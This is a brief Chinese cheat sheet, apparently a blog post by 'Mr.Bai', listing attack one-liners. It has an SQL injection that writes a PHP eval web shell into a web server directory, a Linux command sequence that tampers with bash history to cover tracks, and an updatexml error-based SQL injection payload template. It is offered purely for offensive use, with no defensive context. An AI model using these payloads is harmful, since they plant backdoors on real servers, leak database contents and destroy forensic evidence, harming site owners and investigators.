SQL注入一句话:
select '<? php eval($_POST[xiaobai]);?>' into outfile 'd:/wwwroot/1.php';
Linux清除访问日志一句话:
cd ~ cat .bash_history > .h history -c;history -w;cat .h > .bash_history; rm -f .h;exit
updatexml注入一句话:
id=1 and updatexml(1,concat(0x7e,(PAYLOAD),0x7e),1)
本文作者为Mr.Bai,转载请注明。